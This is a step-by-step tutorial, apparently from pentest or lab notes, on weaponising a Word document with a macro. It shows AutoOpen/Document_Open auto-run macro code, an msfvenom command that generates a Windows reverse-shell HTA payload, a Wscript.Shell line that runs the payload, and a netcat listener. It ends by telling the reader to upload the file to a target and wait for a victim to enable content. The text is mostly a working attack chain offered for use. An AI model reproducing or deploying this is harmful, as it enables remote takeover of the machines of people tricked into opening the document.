Macro

Preparation

• Install Office.

• Create a Word document, called Evil.doc.

• Open a Macros from View menu. Select 'Evil' document in Macros in:

• Insert your macro name, 'MyMacro' in the Macro name: and then click 'Create'

• This will take you to a VB editor.

• Add the following script to your new macro.

  Sub AutoOpen() 
    MyMacro 
  End Sub 
  Sub Document_Open() 
    MyMacro 
  End Sub

• Create a reverse shell payload with hta extension via msfvenom

# Kali
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.128 LPORT=1234 -f hta-psh -o evil.hta

• Make them readable with a python script. Download hta2macro.py.

# Kali
python hta2macro.py evil.hta

• Copy the split string to the Macro and add some commands in the Macro.

# Office Macro Editor
Dim Str As String

<Your string here>

CreateObject("Wscript.Shell").Run Str

End Sub

• and save it as Word 97 format.

• When you check the macro again, you see the following scripts.

• Set up a netcat listener to validate your macro to work.

# Kali
nc -nlvp 1234

• Open the word document.

• Click Enable Content.

• Kali machine, you will see the connection.

Execution

• Check your macro

# Kali
sudo pip install -U oletools
olevba evil.doc

# Check if your macro exists

• Set up a netcat listener again, upload the document to your target location, and wait until someone opens the document and enable content.